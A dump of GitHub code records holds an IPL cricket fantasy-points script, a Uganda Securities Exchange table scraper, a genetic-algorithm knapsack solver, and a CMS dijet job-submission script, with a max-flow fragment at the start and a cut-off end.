resid[b:a] += flow\n if resid[a:b] == 0:\n resid.pop_edge(a, b)\n\n total_flow += flow\n\n return total_flow\n\n","repo_name":"apribadi/practicum","sub_path":"feeding/sgraph/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"28457292599","text":"# will later add player roles to get much deeper insights\n\nimport os\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\n\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_columns',40)\npd.set_option('display.max_rows',1000)\n\nmatches = pd.read_csv('IPL_matches.csv')\ndeliveries_including_superovers = pd.read_csv('IPL_deliveries.csv')\n\ndeliveries = deliveries_including_superovers[(deliveries_including_superovers['innings'] == '1st innings') | (deliveries_including_superovers['innings'] == '2nd innings')]\nmd = matches.merge(deliveries)\n\nbatsmanscores = md.groupby(['season', 'match_id', 'striker'], sort=False).agg(np.sum)\nbatsmanscores = batsmanscores[['batsman_runs']]\nbatsmanscores.reset_index(inplace=True)\nbatsmanscores.rename(columns={'striker': 'player'}, inplace=True)\n\nbowlerprep = md[(md['kind_of_dismissal'] != 'run out') & (md['kind_of_dismissal'] != 'retired hurt') & (md['kind_of_dismissal'] != 'obstructing the field')]\nbowlerscores = bowlerprep.groupby(['season', 'match_id', 'bowler'], sort=False).agg(np.sum)\nbowlerscores = bowlerscores[['wicket']]\nbowlerscores.reset_index(inplace=True)\nbowlerscores.rename(columns={'bowler': 'player'}, inplace=True)\n\nfielderprep = md.copy()\n#\"Caught and bowled\" wicket deliveries have fielder column empty which must have the value of bowler himself\nfielderprep['fielders'] = np.where(fielderprep['kind_of_dismissal']=='caught and bowled', fielderprep['bowler'], fielderprep['fielders'])\n\nfielderprep = fielderprep.groupby(['season', 'match_id', 'bowler', 'kind_of_dismissal', 'fielders']).agg(np.sum)\nfielderprep.reset_index(inplace =True)\nfielderprep = fielderprep.drop(['win_by_runs', 'win_by_wickets', 'delivery', 'wides', 'legbyes',\n 'noballs', 'byes', 'penalty', 'non_boundary', 'batsman_runs',\n 'extra_runs', 'total_runs', 'wicket'], axis=1)\nfielderprep['fielders'] = fielderprep['fielders'].str.replace('[','').str.replace(']','').str.replace(\"'\",\"\")\n\nfielderprep.drop('bowler', axis =1, inplace = True)\nfielderprep.rename(columns={'fielders':'player'}, inplace=True)\n\n# There are no points for substitutes, let's remove those rows.\nfor i, j in zip(fielderprep.index, fielderprep['player']):\n if '(sub)' in j:\n fielderprep.drop(i, inplace=True)\n\n fielderprep['fielding_points'] = np.where(fielderprep['kind_of_dismissal']=='caught', 8, 0)\nfielderprep['fielding_points'] = np.where(fielderprep['kind_of_dismissal']=='caught and bowled', 8, fielderprep['fielding_points'])\nfielderprep['fielding_points'] = np.where(fielderprep['kind_of_dismissal']=='stumped', 12, fielderprep['fielding_points'])\n\n# assigning points for direct hits\ncondition = (fielderprep['kind_of_dismissal']=='run out') & (fielderprep['player'].str.split(',').str.len()==1)\nfielderprep['fielding_points'] = np.where(condition, 12, fielderprep['fielding_points'])\n\n# assigning points for non-direct hits\nfielderprep = fielderprep.assign(player=fielderprep['player'].str.split(',')).explode('player')\nfielderprep['fielding_points'] = np.where(fielderprep['fielding_points']==0,6,fielderprep['fielding_points'])\nfieldingscores = fielderprep.groupby(['season', 'match_id', 'player']).agg(np.sum).reset_index()\nfieldingscores['player'] = fieldingscores['player'].str.strip()\nmatchteam_bb = batsmanscores.merge(bowlerscores, left_on=['season', 'match_id', 'player'], right_on=['season', 'match_id', 'player'], how='outer')\n\nmatchteam_bb.rename(columns={'batsman_runs': 'player_runs', 'wicket': 'player_wickets'}, inplace=True)\nmatchteam_bb.fillna(0, inplace=True)\nmatchteam = matchteam_bb.merge(fieldingscores, left_on=['season', 'match_id', 'player'], right_on=['season', 'match_id', 'player'], how='outer')\nmatchteam.fillna(0, inplace=True)\n\n# making points columns\nmatchteam['runs_points'] = np.where((matchteam['player_runs'] >= 50) & (matchteam['player_runs'] < 100), matchteam['player_runs']+8, matchteam['player_runs'])\nmatchteam['runs_points'] = np.where(matchteam['player_runs'] >= 100, matchteam['player_runs']+16, matchteam['runs_points'])\nmatchteam['runs_points'] = np.where(matchteam['player_runs'] == 0, -2, matchteam['runs_points'])\n\nmatchteam['bowling_points'] = np.where(matchteam['player_wickets'] >= 4, (matchteam['player_wickets']*25)+16, matchteam['player_wickets']*25)\n\nmatchteam['total_points'] = matchteam['runs_points'] + matchteam['bowling_points'] + matchteam['fielding_points']\n\n# dreamteams for matches\nseason_list = []\nmatch_num = []\nplayer_name = []\nrun_points = []\nbowl_points = []\nfield_points = []\nplayer_points = []\n\n# I tried sorting, that messes up the grouped matches, so now we take in each match and then sort.\n# Then we append top 11 players and their points to lists.\n\nfor i in matchteam['match_id'].unique():\n tempdf = matchteam[matchteam['match_id'] == i]\n topelevendf = tempdf.nlargest(11, 'total_points')\n for j in list(topelevendf['match_id']):\n match_num.append(j)\n for k in list(topelevendf['player']):\n player_name.append(k)\n for l in list(topelevendf['total_points']):\n player_points.append(l)\n for m in list(topelevendf['season']):\n season_list.append(m)\n for n in list(topelevendf['runs_points']):\n run_points.append(n)\n for o in list(topelevendf['bowling_points']):\n bowl_points.append(o)\n for p in list(topelevendf['fielding_points']):\n field_points.append(p)\ndreamteamdf = pd.DataFrame({'season': season_list, 'match_id': match_num, 'player': player_name,\n 'runs_points': run_points,'bowling_points': bowl_points, 'fielding_points': field_points,\n 'total_points': player_points})\n\n# using IPL_Players dataset to add a column of DOB for matchteam\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\nipl_players = pd.read_csv('IPL_Players.csv')\nipl_players.drop(['Age', 'Teams', 'Matches', 'Runs', 'Bat avg', 'Wickets',\n 'Bowl avg', 'PlayerID'], axis=1, inplace=True)\nipl_players.rename(columns={'Name': 'player'}, inplace=True)\nipl_players['DOB'] = pd.to_datetime(ipl_players['DOB'])\n\nmatchteammergedf = matchteam.merge(ipl_players, how='outer', left_on='player', right_on='player')\nmatchteammergedf = matchteammergedf.loc[0:17650, :] # removing a few NA rows at the bottom arising out of merging\nmatchteammergedf['season'] = pd.to_datetime(matchteammergedf['season'], format='%Y')\nmatchteammergedf['matchday_player_age'] = (matchteammergedf['season'] - matchteammergedf['DOB']).astype('<m8[Y]')\n# Just accomplished a cool thing, we have age as on match day for all players for all matches\n\n# using IPL_Players dataset to add a column of DOB for dreamteamdf too\n\ndreamteamdfmerge = dreamteamdf.merge(ipl_players, how='inner')\ndreamteamdfmerge['season'] = pd.to_datetime(dreamteamdfmerge['season'], format='%Y')\ndreamteamdfmerge['matchday_player_age'] = (dreamteamdfmerge['season'] - dreamteamdfmerge['DOB']).astype('<m8[Y]')\n\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\nmatchteammergedf.to_csv('IPL_matchwise_player_points.csv', index=False)\n\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\ndreamteamdfmerge.to_csv('IPL_historical_dreamteams.csv', index=False)\n","repo_name":"santosh7a/cricketviz","sub_path":"IPL_HistoricalDreamTeams.py","file_name":"IPL_HistoricalDreamTeams.py","file_ext":"py","file_size_in_byte":7172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29099495135","text":"\r\n\r\n# This is a program to predict the stock price in the ugandan stock market\r\nimport csv\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom csv import writer\r\nimport time\r\n# Getting data from Uganda Securities Exchange\r\nurl='https://www.use.or.ug/content/market-snapshot'\r\nresponse = requests.get(url)\r\nsoup = BeautifulSoup(response.text,'html.parser')\r\n\r\n# Assigning a name to the data\r\nfilename ='use data.csv'\r\ncsv_writer = csv.writer(open(filename,'w'))\r\n\r\n# Making sure that the file gets updated by using time as a constraint\r\ntimestr1 = time.strftime(\"%Y%m%d-%H%M%S\")\r\nchanged_filename = filename.split(\".\")[0]+timestr1+\".\"+filename.split(\".\")[1]\r\nprint(changed_filename)\r\n\r\n# Getting the data from the table in the U.S.E site ie. Market snapshot\r\nfor tr in soup.find_all('tr'):\r\n data =[]\r\n\r\n for th in tr.find_all('th'):\r\n data.append(th.text)\r\n\r\n if data:\r\n print(\"Inserting Headers:{}\".format(','.join(data)))\r\n csv_writer.writerow(data)\r\n continue\r\n\r\n for td in tr.find_all('td'):\r\n data.append(td.text.strip())\r\n\r\n if data:\r\n print(\"Inserting Table Data:{}\".format(','.join(data)))\r\n csv_writer.writerow(data)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Namrod16127/E-broker_csvs","sub_path":"data_fetch.py","file_name":"data_fetch.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7268423533","text":"import numpy as np\nimport time\nimport random\nimport matplotlib.pyplot as plt\nimport os\n\ndef read(data_file,i):\n \"\"\"\n 读取txt文件\n :param data_file:输入测试样例文件路径\n :param i:样例i\n :return: W:背包最大容量(int);N:物品数量(int);w:每件物品的重量(list);v:每件物品的价值(list)\n \"\"\"\n W = 0\n N = 0\n w = []\n v = []\n with open(data_file,'r') as f:\n string = f.readlines()\n for j in range(len(string)):\n if string[j] == '(' + str(i) + ')' + ' \\n':\n W = int(string[j+2].split(' ')[0])\n N = int(string[j+2].split(' ')[1])\n for k in range(1,N+1):\n w.append(int(string[j+k+2].split(' ')[0]))\n v.append(int(string[j+k+2].split(' ')[1]))\n return W, N, w, v\n\nclass MyGA(object):\n #类属性\n cross_p = 0.6\n variation_p = 0.2\n pop_num = 100 #种群内个体数目\n cross_num = int(pop_num/2) #交叉的对数\n #精英解参数\n elite_num = 4 #精英解池的个数\n elite_th = 0 #精英解池的最低门限\n elite_min_index = 0 #精英解池 最小价值精英解的索引\n #自适应参数\n avg_fitness = 0\n max_fitness = 0\n\n #类方法\n def __init__(self,W,N,w,v):\n \"\"\"\n 初始化类的函数\n :param W: 背包最大承重\n :param N: 物品总数\n :param w: 每件物品的重量\n :param v: 每件物品的价值\n \"\"\"\n self.bag_max_w = W\n self.N = N\n self.w = w\n self.v = v\n #迭代的代数采用十倍的物品数量\n self.generation = self.N*10\n #定义一个元组,便于表达数组大小\n self.shape =(self.pop_num,N)\n #初始化种群,0的概率为0.9,1的概率为0.1,防止重量过大适应度减少为0\n self.population = np.random.choice([0, 1], size=self.shape, p=[.9, .1])\n #初始化价值存储数组\n self.max_value_pre_gen = np.zeros(self.generation,dtype=np.int32)\n #初始化精英解池\n self.elite = np.zeros(shape=(self.elite_num,N),dtype=np.uint32)\n #初始化精英解池的价值\n self.elite_value = np.zeros(shape=self.elite_num,dtype=np.uint32)\n #记录每一轮精英解池的最大值\n self.max_value_elite = np.zeros(self.generation,dtype=np.int32)\n\n\n\n\n def fitnessF(self):\n \"\"\"\n 计算适应度的函数\n :param self.population :所有个体\n :param self.v :每件物品的价值\n :param self.w :每件物品的重量\n :param self.bag_max_w :背包最大承重\n :param self.value :当前每个个体背包内的价值\n :param self.fitness :当前每个个体的适应度\n \"\"\"\n #计算每个个体的价值\n self.value = np.dot(self.population,self.v)\n #计算每个个体的所带物品的重量\n self.weight = self.population.dot(self.w)\n self.fitness =self.value\n #大于背包最大值的个体适应度清零\n for i in range(self.pop_num):\n if(self.weight[i]>=self.bag_max_w):\n self.fitness[i] = 0\n #计算平均适应度\n self.avg_fitness = np.average(self.fitness)\n self.max_fitness = np.max(self.fitness)\n\n\n\n def select(self):\n \"\"\"\n 用轮盘赌的方法确定子代个体\n :param self.fitness :当前每个个体的适应度\n :param fitness_sum :所有适应度的总和\n :param cumulative_p :累计概率\n :param new_population :新选出来的子代\n 引入精英解来共同产生子代\n \"\"\"\n #总和归一化\n fitness_sum = np.sum(self.fitness)\n select_p = self.fitness/fitness_sum\n #计算累计概率\n cumulative_p = np.zeros(shape=(self.pop_num,1),dtype=np.float64)\n cumulative_p[0,0] = select_p[0]\n for i in range(1,self.pop_num):\n cumulative_p[i] = cumulative_p[i-1] + select_p[i]\n #生成新的子代\n new_population = np.zeros_like(self.population)\n\n #子代个体生成的顺序\n order = random.sample(range(self.pop_num),self.pop_num)\n From_parent = order[0:self.pop_num-self.elite_num]\n From_elite = order[self.pop_num-self.elite_num:]\n #从父代中生成子代\n for i in From_parent:\n #轮盘赌的方法\n rand_num = np.random.uniform()\n for j,cum_val in enumerate(cumulative_p):\n if(cum_val>rand_num):\n break\n new_population[i,:] = self.population[j,:]\n #从精英解池中获得子代\n for index,value in enumerate(From_elite):\n new_population[value,:] = self.elite[index,:]\n #更新群体\n self.population = new_population\n\n def cross(self):\n \"\"\"\n 进行交叉的函数\n 采用随机两个交叉位点 将中间段进行互换\n \"\"\"\n for i in range(self.cross_num):\n #先判断要不要进行交叉\n rand_num = np.random.uniform()\n if(rand_num>self.cross_p):\n continue\n #产生两个随机的位置\n cross_pos = np.sort(random.sample(range(0, self.N), 2))\n #中间两端互换\n section = self.population[2*i,cross_pos[0]:cross_pos[1]].copy()\n self.population[2*i,cross_pos[0]:cross_pos[1]] = self.population[2*i+1,cross_pos[0]:cross_pos[1]]\n self.population[2*i+1,cross_pos[0]:cross_pos[1]] = section\n\n def variation(self):\n '''\n 进行变异的函数\n 01翻转\n '''\n for i in range(self.pop_num):\n #先判断要不要进行变异\n rand_num = np.random.uniform()\n if(rand_num>self.variation_p):\n continue\n #变异也只变一位,避免搜索空间过大\n variation_pos = np.random.randint(self.N,dtype=np.uint8)\n self.population[i,variation_pos] = np.mod(self.population[i,variation_pos]+1,2)\n\n def record_best_individual(self,times):\n #保存最大价值\n self.max_value_pre_gen[times] = np.max(self.fitness)\n\n #保存精英解中最大值\n self.max_value_elite[times] = np.max(self.elite_value)\n\n\n def elite_renew(self):\n for i in range(self.pop_num):\n if(self.fitness[i]>self.elite_th):\n #更新精英解池和精英解价值\n self.elite[self.elite_min_index,:] = self.population[i,:]\n self.elite_value[self.elite_min_index] = self.fitness[i]\n #更新精英解池最小值的索引\n index = np.argmin(self.elite_value)\n #更新精英解池的最低门限的索引\n self.elite_min_index = index\n #更新精英解池的最低门限\n self.elite_th = self.elite_value[index]\n\n #分段的自适应交叉变异系数,本文件未使用此方法\n def F_adapt(self,k,f_avg,f_max,x):\n return k if x<=f_avg else k*(f_max-x)/(f_max-f_avg)\n\n\n\ndef GA(W,N,w,v,data_select,res_value):\n \"\"\"\n 遗传算法解决0-1背包问题主函数\n :param W: 背包最大承重\n :param N: 物品总数\n :param w: 每件物品的重量\n :param v: 每件物品的价值\n :param save_fig_path: 样例i的收敛曲线存储路径\n :return: max_value:求解的放入背包的物品最大价值(int);best_solu:放入背包的物品序号(list)\n \"\"\"\n #初始化\n ga = MyGA(W,N,w,v)\n\n for i in range(ga.generation):\n #计算适应度函数\n ga.fitnessF()\n #更新精英解池\n ga.elite_renew()\n #交叉\n ga.cross()\n #变异\n ga.variation()\n #计算适应度函数\n ga.fitnessF()\n #更新精英解池\n ga.elite_renew()\n # #保留最大的价值\n ga.record_best_individual(i)\n #选择\n ga.select()\n #再次计算适应度函数\n ga.fitnessF()\n #找到最大价值\n max_value = np.max(ga.fitness)\n #找到最佳解决方案\n best_solu = ga.population[np.argmax(ga.fitness),:]\n\n #如果比历史最佳高,才保留图片\n if(max_value>res_value):\n #绘图\n plt.clf()\n plt.plot(ga.max_value_pre_gen)\n plt.savefig(\"测试结果/result\"+str(data_select)+\".png\")\n\n return max_value,best_solu\n\n\n\nif __name__ == '__main__':\n data_file = \"实验代码/data.txt\"\n #可以选择的数据种类\n select_data_all = [1,2,3,4,5]\n #终端输入选择的序号\n data_select = int(input(\"请输入读取的文件序号(只输入单个数字即可):\"))\n #终端输入迭代的次数\n times = np.uint64(input(\"请输入迭代的次数(只输入数字即可):\"))\n #判断输入是否合法\n if(data_select not in select_data_all):\n print(\"请输入 1 2 3 4 5 中的一个数字\")\n exit(0)\n #读取文件\n W,N,w,v = read(data_file,data_select)\n #测试文档的路径\n test_path = \"测试结果/result\"+str(data_select)+\".txt\"\n if(os.path.isfile(test_path)):#如果文件存在\n fileHandler = open (test_path, \"r\",encoding ='utf-8')\n #第六行保存着最佳值\n line = fileHandler.readlines()[5]\n #第六行第一个“:”后的数字就是历史最大价值\n res_value = int(line.split(':')[1])\n else:#如果文件不存在,则定义价值为-1\n res_value = -1\n #判断是否要写txt文件的标志位\n new_write = 0\n #开始循环\n for j in range(times):\n #计时开始\n start_time = time.time()\n #开始计算\n max_value,best_solu = GA(W,N,w,v,data_select,res_value)\n #计时结束\n end_time = time.time()\n\n #判断结果准确性\n assert len(best_solu)==N,'物品的件数为%d,给出的方案长度应当与之匹配'%N\n assert best_solu.dot(v)==max_value,'最大价值与给出的方案不匹配'\n assert best_solu.dot(w)<W,'给出的方案超重'\n print(\"装入背包的最大价值:{}\\n\".format(max_value))\n\n #如果大于当前已知的值,则更新txt文档\n if(max_value>res_value):\n #保存参数\n res_value = max_value\n res_solu = best_solu\n res_T = end_time-start_time\n #写入标志位\n new_write=1\n print(\"出现更大的值\")\n #写入txt文件\n if(new_write==1):\n with open(\"测试结果/result\"+str(data_select)+\".txt\",\"w\",encoding ='utf-8') as f:\n f.write(\"背包最大承重:{}\\n\".format(W))\n\n f.write(\"物品件数:{}\\n\".format(N))\n\n f.write(\"每件物品的重量:[\")\n for i in range(N-1):\n f.write(\"{},\".format(w[i]))\n f.write(\"{}]\\n\".format(w[N-1])) \n\n f.write(\"每件物品的价值:[\")\n for i in range(N-1):\n f.write(\"{},\".format(v[i]))\n f.write(\"{}]\\n\".format(v[N-1])) \n\n f.write(\"收敛曲线存储的文件名:\"+\"result\"+str(data_select)+\".png\"+\"\\n\")\n\n f.write(\"装入背包的最大价值:{}\\n\".format(res_value))\n\n f.write(\"装入背包最大价值的最优物品组合:[\")\n for i in range(N-1):\n f.write(\"{},\".format(res_solu[i]))\n f.write(\"{}]\\n\".format(res_solu[N-1])) \n\n f.write(\"测试用时:{:.6f}s\\n\".format(res_T)) \n\n\n","repo_name":"littleBu0210/test","sub_path":"测试代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11640,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"19516028415","text":"#!/usr/bin/env python3\n\nfrom createConfigFiles import *\n\n@timeit\ndef condor_control(original_dir =\"./SubmittedJobs/\" , JECVersions_Data=[\"Autumn18_V4\"], JetLabels=[\"AK4CHS\"], systematics=[\"\", \"PU\", \"JEC\", \"JER\"], internal_option=\"-l\", processes=[], extratext=\"\"):\n count = 0\n list_processes = []\n nProcess = 48\n time_ = 1\n for newJECVersion in JECVersions_Data:\n for newJetLabel in JetLabels:\n for sys in systematics:\n dirs = [\"\", \"up\", \"down\"]\n for dir in dirs:\n if sys == \"\" and dir != \"\":\n continue\n if sys == \"JER\" and dir != \"\":\n continue\n if sys == \"JER\" and dir == \"\":\n dir = \"nominal\"\n path = original_dir+newJECVersion+\"/\"+newJetLabel+extratext+\"/\"+sys+\"/\"+dir+\"/\"\n for sample in sorted(os.listdir(path)):\n if not \".xml\" in sample:\n continue\n if all(not control in sample for control in processes): continue\n if internal_option:\n command = ['sframe_batch.py', internal_option, path+sample]\n else:\n command = ['sframe_batch.py', path+sample]\n command = [path]+command\n list_processes.append(command)\n if internal_option == \"-f\":\n nProcess = 20\n if internal_option == \"\":\n time_ = 0.5\n print(len(list_processes))\n parallelise(list_processes, nProcess, cwd=True, time_=time_)\n\n\n@timeit\ndef delete_workdir(original_dir =\"./SubmittedJobs/\" , JECVersions_Data=[\"Autumn18_V4\", \"Autumn18_V4\"], JetLabels=[\"AK4CHS\", \"AK8Puppi\"], systematics=[\"\", \"PU\", \"JEC\", \"JER\"],extratext=\"\"):\n add_name = original_dir[original_dir.find(\"SubmittedJobs\")+len(\"SubmittedJobs\"):-1]\n for sample in [\"DATA\", \"QCD\"]:\n for newJECVersion in JECVersions_Data:\n for newJetLabel in JetLabels:\n for sys in systematics:\n dirs = [\"\", \"up\", \"down\"]\n for dir in dirs:\n if sys == \"\" and dir != \"\":\n continue\n if sys == \"JER\" and dir != \"\":\n continue\n if sys == \"JER\" and dir == \"\":\n \t dir = \"nominal\"\n if 'PS' in sys:\n if 'DATA'==sample:\n continue\n path = userPathSframeOutput+\"/\"+newJECVersion+\"/\"+newJetLabel+extratext+\"/\"+sys+\"/\"+dir+\"/\"\n if os.path.isdir(path):\n for workdir in sorted(os.listdir(path)):\n if \"workdir\" in workdir:\n cmd = \"rm -fr %s\" % (path+workdir)\n a = os.system(cmd)\n print(cmd)\n path = original_dir+newJECVersion+\"/\"+newJetLabel+extratext+\"/\"+sys+\"/\"+dir+\"/\"\n if os.path.isdir(path):\n for workdir in sorted(os.listdir(path)):\n if \"workdir\" in workdir:\n cmd = \"rm -fr %s\" % (path+workdir)\n a = os.system(cmd)\n\n\n\n\ndef main_program(option=\"\", internal_option=\"\", study=\"Standard\", processes=[], others=[], JECVersions_Data=[], JECVersions_MC=[], JetLabels=[], systematics=[], original_dir=\"./SubmittedJobs/\", original_file=\"JER2018.xml\", year=\"2018\", isMB=False, test_trigger=False, isThreshold=False, isLowPt=False, isECAL=False, extratext=\"\"):\n if option == \"new\":\n createConfigFiles(study, processes, others, JECVersions_Data, JECVersions_MC, JetLabels, systematics, original_dir, original_file, outdir, year, isMB, test_trigger, isThreshold,isLowPt,isECAL,extratext)\n elif option == \"remove\" or option == \"delete\":\n delete_workdir(original_dir, JECVersions_Data, JetLabels, systematics, extratext)\n else:\n condor_control(original_dir, JECVersions_Data, JetLabels, systematics, internal_option, processes, extratext)\n\n\n\n##################################################\n# #\n# MAIN Program #\n# #\n##################################################\n\nUSER = os.environ[\"USER\"]\n\ntry:\n option = sys.argv[1]\nexcept:\n option = \"\"\n\nif option == \"resubmit\":\n internal_option = \"-r\"\nelif option == \"submit\":\n internal_option = \"-s\"\nelif option == \"add\" or option == \"merge\":\n internal_option = \"-f\"\nelif option == \"list\":\n internal_option = \"-l\"\nelif option == \"new\":\n internal_option = \"\"\nelif option == \"remove\" or option == \"delete\":\n internal_option = \"\"\nelif option == \"split\":\n internal_option = \"\"\nelse:\n internal_option = \"\"\n\n\nQCD_process= []\nData_process= []\n\nQCD_process.append(\"QCDHT50to100_2018\")\nQCD_process.append(\"QCDHT100to200_2018\")\nQCD_process.append(\"QCDHT200to300_2018\")\nQCD_process.append(\"QCDHT300to500_2018\")\nQCD_process.append(\"QCDHT500to700_2018\")\nQCD_process.append(\"QCDHT700to1000_2018\")\nQCD_process.append(\"QCDHT1000to1500_2018\")\nQCD_process.append(\"QCDHT1500to2000_2018\")\nQCD_process.append(\"QCDHT2000toInf_2018\")\nData_process.append(\"DATA_RunA_2018\")\nData_process.append(\"DATA_RunB_2018\")\nData_process.append(\"DATA_RunC_2018\")\nData_process.append(\"DATA_RunD_2018\")\n\nQCD_process.append(\"QCDHT50to100_UL16preVFP\")\nQCD_process.append(\"QCDHT100to200_UL16preVFP\")\nQCD_process.append(\"QCDHT200to300_UL16preVFP\")\nQCD_process.append(\"QCDHT300to500_UL16preVFP\")\nQCD_process.append(\"QCDHT500to700_UL16preVFP\")\nQCD_process.append(\"QCDHT700to1000_UL16preVFP\")\nQCD_process.append(\"QCDHT1000to1500_UL16preVFP\")\nQCD_process.append(\"QCDHT1500to2000_UL16preVFP\")\nQCD_process.append(\"QCDHT2000toInf_UL16preVFP\")\nQCD_process.append(\"QCDHT50to100_UL16postVFP\")\nQCD_process.append(\"QCDHT100to200_UL16postVFP\")\nQCD_process.append(\"QCDHT200to300_UL16postVFP\")\nQCD_process.append(\"QCDHT300to500_UL16postVFP\")\nQCD_process.append(\"QCDHT500to700_UL16postVFP\")\nQCD_process.append(\"QCDHT700to1000_UL16postVFP\")\nQCD_process.append(\"QCDHT1000to1500_UL16postVFP\")\nQCD_process.append(\"QCDHT1500to2000_UL16postVFP\")\nQCD_process.append(\"QCDHT2000toInf_UL16postVFP\")\nData_process.append(\"DATA_RunB_UL16preVFP\")\nData_process.append(\"DATA_RunC_UL16preVFP\")\nData_process.append(\"DATA_RunD_UL16preVFP\")\nData_process.append(\"DATA_RunE_UL16preVFP\")\nData_process.append(\"DATA_RunF_UL16preVFP\")\nData_process.append(\"DATA_RunF_UL16postVFP\")\nData_process.append(\"DATA_RunG_UL16postVFP\")\nData_process.append(\"DATA_RunH_UL16postVFP\")\n\n\nQCD_process.append(\"QCDHT50to100_UL17\")\nQCD_process.append(\"QCDHT100to200_UL17\")\nQCD_process.append(\"QCDHT200to300_UL17\")\nQCD_process.append(\"QCDHT300to500_UL17\")\nQCD_process.append(\"QCDHT500to700_UL17\")\nQCD_process.append(\"QCDHT700to1000_UL17\")\nQCD_process.append(\"QCDHT1000to1500_UL17\")\nQCD_process.append(\"QCDHT1500to2000_UL17\")\nQCD_process.append(\"QCDHT2000toInf_UL17\")\nQCD_process.append(\"QCDPt15to30_UL17\")\nQCD_process.append(\"QCDPt30to50_UL17\")\nQCD_process.append(\"QCDPt50to80_UL17\")\nQCD_process.append(\"QCDPt80to120_UL17\")\nQCD_process.append(\"QCDPt120to170_UL17\")\nQCD_process.append(\"QCDPt170to300_UL17\")\nQCD_process.append(\"QCDPt300to470_UL17\")\nQCD_process.append(\"QCDPt470to600_UL17\")\nQCD_process.append(\"QCDPt600to800_UL17\")\nQCD_process.append(\"QCDPt800to1000_UL17\")\nQCD_process.append(\"QCDPt1000to1400_UL17\")\nQCD_process.append(\"QCDPt1400to1800_UL17\")\nQCD_process.append(\"QCDPt1800to2400_UL17\")\nQCD_process.append(\"QCDPt2400to3200_UL17\")\nQCD_process.append(\"QCDPt3200toInf_UL17\")\nData_process.append(\"DATA_RunB_UL17\")\nData_process.append(\"DATA_RunC_UL17\")\nData_process.append(\"DATA_RunD_UL17\")\nData_process.append(\"DATA_RunE_UL17\")\nData_process.append(\"DATA_RunF_UL17\")\n\n\n\nQCD_process.append(\"QCDHT50to100_UL18\")\nQCD_process.append(\"QCDHT100to200_UL18\")\nQCD_process.append(\"QCDHT200to300_UL18\")\nQCD_process.append(\"QCDHT300to500_UL18\")\nQCD_process.append(\"QCDHT500to700_UL18\")\nQCD_process.append(\"QCDHT700to1000_UL18\")\nQCD_process.append(\"QCDHT1000to1500_UL18\")\nQCD_process.append(\"QCDHT1500to2000_UL18\")\nQCD_process.append(\"QCDHT2000toInf_UL18\")\nData_process.append(\"DATA_RunA_UL18\")\nData_process.append(\"DATA_RunB_UL18\")\nData_process.append(\"DATA_RunC_UL18\")\nData_process.append(\"DATA_RunD_UL18\")\n\n\n# JECVersions_Data = [\"Autumn18_V4\"]\n# JetLabels = [\"AK4CHS\", \"AK8Puppi\"]\n# systematics = [\"\", \"PU\", \"JEC\", \"JER\"]\n\n# year = \"2018\"\n# year = \"UL16preVFP\"\n# year = \"UL16postVFP\"\nyear = \"UL17\"\n# year = \"UL18\"\n\n\nstudies = []\n# studies.append(\"Standard\")\n# studies.append(\"L1L2Residual\")\n# studies.append(\"L1L2\")\n# studies.append(\"eta_JER\")\nstudies.append(\"eta_common\")\n# studies.append(\"eta_common\")\n# studies.append(\"eta_L2R\")\n# studies.append(\"eta_narrow\")\n#studies.append(\"eta_simple\")\n\nprint(\"Running for: \", studies)\ntime.sleep(2)\n\n# outdir = \"DiJetJERC_DiJetHLT\"\noutdir = \"DiJetJERC_DiJetHLT\"\noriginal_file = outdir+\".xml\"\noriginal_dir_ = os.getcwd()\n\n\n# QCDSamples = [\"QCDPt\",\"QCDHT\", \"DATA\"]\n# QCDSamples = [\"QCDHT\", \"DATA\"]\n# QCDSamples = [\"DATA\"]\nQCDSamples = [\"QCDHT\"]\nprocesses = list(filter( lambda sample: year in sample and any(QCD in sample for QCD in QCDSamples) , QCD_process+Data_process))\nothers = list(set(QCD_process+Data_process)-set(processes))\n\nJECVersions_Data = {}\nJECVersions_MC = {}\n\nJECVersions_Data[\"UL16preVFP\"] = [\"Summer20UL16APV_V2\"]\nJECVersions_MC[\"UL16preVFP\"] = [\"Summer20UL16APV_V2\"]\nJECVersions_Data[\"UL16postVFP\"] = [\"Summer20UL16_V2\"]\nJECVersions_MC[\"UL16postVFP\"] = [\"Summer20UL16_V2\"]\nJECVersions_Data[\"UL17\"] = [\"Summer20UL17_V2\"]\nJECVersions_MC[\"UL17\"] = [\"Summer20UL17_V2\"]\nJECVersions_Data[\"UL18\"] = [\"Summer20UL18_V2\"]\nJECVersions_MC[\"UL18\"] = [\"Summer20UL18_V2\"]\n# JECVersions_Data[\"UL18\"] = [\"Summer20UL18_V1\"]\n# JECVersions_MC[\"UL18\"] = [\"Summer20UL18_V1\"]\n\n# JECVersions_Data[\"UL18\"] = [\"Summer19UL18_V5\"]\n# JECVersions_MC[\"UL18\"] = [\"Summer19UL18_V5\"]\n\n# JetLabels = [\"AK4CHS\", \"AK4Puppi\", \"AK8CHS\", \"AK8Puppi\"]\n# JetLabels = [\"AK4Puppi_v11\"]\nJetLabels = [\"AK4Puppi\"]\n# JetLabels = [\"AK4CHS\", \"AK4Puppi\"]\n# JetLabels = [\"AK8Puppi\", \"AK4Puppi\"]\n# JetLabels = [ \"AK8Puppi\"]\n# systematics = 